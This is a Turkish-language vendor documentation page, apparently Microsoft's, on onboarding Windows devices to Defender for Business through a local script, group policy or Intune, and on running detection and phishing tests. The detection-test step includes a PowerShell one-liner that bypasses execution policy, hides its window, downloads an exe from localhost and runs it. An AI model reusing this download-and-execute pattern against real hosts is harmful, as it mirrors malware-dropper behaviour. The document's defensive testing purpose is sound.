Cihazları İş için Microsoft Defender ekleme

Bu makalede, cihazları İş için Defender'a ekleme işlemi açıklanır.

5. adımı gösteren görsel - cihazları İş için Defender'a ekleme.

İş cihazlarınızı hemen korumak için ekleme. Şirketinizin cihazlarını eklemek için çeşitli seçenekler arasından seçim yapabilirsiniz. Bu makalede seçeneklerinizde size yol gösterilir ve eklemenin nasıl çalıştığı açıklanır.

Yapılması gerekenler

  1. Bir sekme seçin:
    • Windows 10 ve 11
    • Mac
    • Mobil (iOS ve Android cihazlar için yeni özellikler kullanılabilir!)
    • Sunucular (Windows Server veya Linux Server)
  2. Ekleme seçeneklerinizi görüntüleyin ve seçili sekmedeki yönergeleri izleyin.
  3. Eklenen cihazların listesini görüntüleyin.
  4. Cihazda kimlik avı testi çalıştırın.
  5. Sonraki adımlarınıza geçin.

Windows 10 ve 11

Not

Windows cihazları aşağıdaki işletim sistemlerinden birini çalıştırıyor olmalıdır:

  • Windows 10 veya 11 İş
  • Windows 10 veya 11 Professional
  • Windows 10 veya 11 Enterprise

Daha fazla bilgi için bkz. İş için Microsoft Defender gereksinimleri.

Windows istemci cihazlarını İş için Defender'a eklemek için aşağıdaki seçeneklerden birini belirleyin:

  • Yerel betik (cihazları Microsoft Defender portalında el ile ekleme için)
  • grup ilkesi (kuruluşunuzda zaten grup ilkesi kullanıyorsanız)
  • Microsoft Intune (zaten Intune kullanıyorsanız)

Windows 10 ve 11 için yerel betik

Windows istemci cihazlarını eklemek için yerel bir betik kullanabilirsiniz. Bir cihazda ekleme betiğini çalıştırdığınızda, Microsoft Entra ID ile bir güven oluşturur (bu güven yoksa), cihazı Microsoft Intune kaydeder (henüz kayıtlı değilse) ve ardından cihazı İş için Defender'a ekler. Şu anda Intune kullanmıyorsanız, yerel betik yöntemi, İş için Defender müşterileri için önerilen ekleme yöntemidir.

İpucu

Yerel betik yöntemini kullanırken bir kerede en fazla 10 cihaz eklemenizi öneririz.

  1. Microsoft Defender portalına ()https://security.microsoft.com gidin ve oturum açın.

  2. Gezinti bölmesinde Ayarlar>Uç Noktaları'nı seçin ve ardından Cihaz yönetimi'nin altında Ekleme'yi seçin.

  3. Windows 10 ve 11'i seçin ve ardından Dağıtım yöntemi bölümünde Yerel betik'i seçin.

  4. Ekleme paketini indir'i seçin. Ekleme paketini çıkarılabilir bir sürücüye kaydetmenizi öneririz.

  5. Bir Windows cihazında, yapılandırma paketinin içeriğini Masaüstü klasörü gibi bir konuma ayıklayın. adlı WindowsDefenderATPLocalOnboardingScript.cmdbir dosyanız olmalıdır.

  6. Bir komut istemini yönetici olarak açın.

  7. Betik dosyasının konumunu yazın. Örneğin, dosyayı Desktop klasörüne kopyaladıysanız %userprofile%\Desktop\WindowsDefenderATPLocalOnboardingScript.cmdyazın ve Enter tuşuna basın (veya Tamam'ı seçin).

  8. Betik çalıştırıldıktan sonra bir algılama testi çalıştırın.

Windows 10 ve 11 için grup ilkesi

Windows istemcilerini eklemek için grup ilkesi kullanmayı tercih ediyorsanız grup ilkesi kullanarak Windows cihazlarını ekleme yönergelerini izleyin. Bu makalede, Uç Nokta için Microsoft Defender ekleme adımları açıklanmaktadır. İş için Defender'a ekleme adımları benzerdir.

Windows 10 ve 11 için Intune

Intune yönetim merkezini (https://intune.microsoft.com ) kullanarak Windows istemcilerini ve diğer cihazları Intune'a ekleyebilirsiniz. cihazları Intune kaydetmek için kullanılabilecek çeşitli yöntemler vardır. Aşağıdaki yöntemlerden birini kullanmanızı öneririz:

Windows 10 ve 11 için otomatik kaydı etkinleştirme

Otomatik kaydı ayarladığınızda, kullanıcılar iş hesabını cihaza ekler. Arka planda cihaz Microsoft Entra ID kaydedip birleştirir ve Intune kaydedilir.

  1. Azure portal (https://portal.azure.com/) gidin ve oturum açın.

  2. Microsoft Entra ID>Mobilite (MDM ve MAM)>Microsoft Intune seçin.

  3. MDM Kullanıcı kapsamını ve MAM kullanıcı kapsamını yapılandırın.

    Intune'da MDM kullanıcı kapsamını ve MAM kullanıcı kapsamını ayarlamanın ekran görüntüsü.

    • MDM Kullanıcı kapsamı için, tüm kullanıcıların Windows cihazlarını otomatik olarak kaydedebilmesi için Tümü seçeneğini belirlemenizi öneririz.

    • MAM kullanıcı kapsamı bölümünde URL'ler için aşağıdaki varsayılan değerleri öneririz:

      • MDM Kullanım Koşulları URL’si
      • MDM Bulma URL’si
      • MAM uyumluluk URL’si
  4. Kaydet'i seçin.

  5. Bir cihaz Intune kaydedildikten sonra, bunu İş için Defender'daki bir cihaz grubuna ekleyebilirsiniz. İş için Defender'da cihaz grupları hakkında daha fazla bilgi edinin.

İpucu

Daha fazla bilgi için bkz. Windows otomatik kaydını etkinleştirme.

Kullanıcılardan Windows 10 ve 11 cihazlarını kaydetmelerini isteyin

  1. Kaydın nasıl çalıştığını görmek için aşağıdaki videoyu izleyin:

  2. Bu makaleyi kuruluşunuzdaki kullanıcılarla paylaşın: Windows 10/11 cihazlarını Intune'a kaydedin.

  3. Bir cihaz Intune kaydedildikten sonra, bunu İş için Defender'daki bir cihaz grubuna ekleyebilirsiniz. İş için Defender'da cihaz grupları hakkında daha fazla bilgi edinin.

Windows 10 veya 11 cihazda algılama testi çalıştırma

Windows cihazlarını İş için Defender'a ekledikten sonra, her şeyin düzgün çalıştığından emin olmak için cihazda bir algılama testi çalıştırabilirsiniz.

  1. Windows cihazında bir klasör oluşturun: C:\test-MDATP-test.

  2. Yönetici olarak Komut İstemi'ni açın.

  3. Komut İstemi penceresinde aşağıdaki PowerShell komutunu çalıştırın:

    powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'
    

Komut çalıştırıldıktan sonra Komut İstemi penceresi otomatik olarak kapatılır. Başarılı olursa algılama testi tamamlandı olarak işaretlenir ve yaklaşık 10 dakika içinde yeni eklenen cihaz için Microsoft Defender portalında (https://security.microsoft.com) yeni bir uyarı görüntülenir.

Eklenen cihazların listesini görüntüleme

Önemli

Aşağıdaki yordamı gerçekleştirmek için Size Genel Yönetici, Güvenlik Yöneticisi veya Güvenlik Okuyucusu gibi uygun bir rol atanmalıdır. Daha fazla bilgi için bkz. İş için Defender'daki roller.

  1. Microsoft Defender portalına ()https://security.microsoft.com gidin ve oturum açın.

  2. Gezinti bölmesinde Varlık>Cihazları'na gidin. Cihaz envanteri görünümü açılır.

Cihazda kimlik avı testi çalıştırma

Bir cihaz ekledikten sonra, cihazın bağlı olduğundan ve uyarıların beklendiği gibi oluşturulduğundan emin olmak için hızlı bir kimlik avı testi çalıştırabilirsiniz.

  1. Bir cihazda adresine https://smartscreentestratings2.netgidin. İş için Defender, kullanıcının cihazında bu URL'yi engellemelidir.

  2. Kuruluşunuzun güvenlik ekibinin bir üyesi olarak Microsoft Defender portalına (https://security.microsoft.com) gidin ve oturum açın.

  3. Gezinti bölmesinde Olaylar'a gidin. Bir cihazın kimlik avı sitesine erişmeye çalıştığını gösteren bilgilendirici bir uyarı görmeniz gerekir.

Sonraki adımlar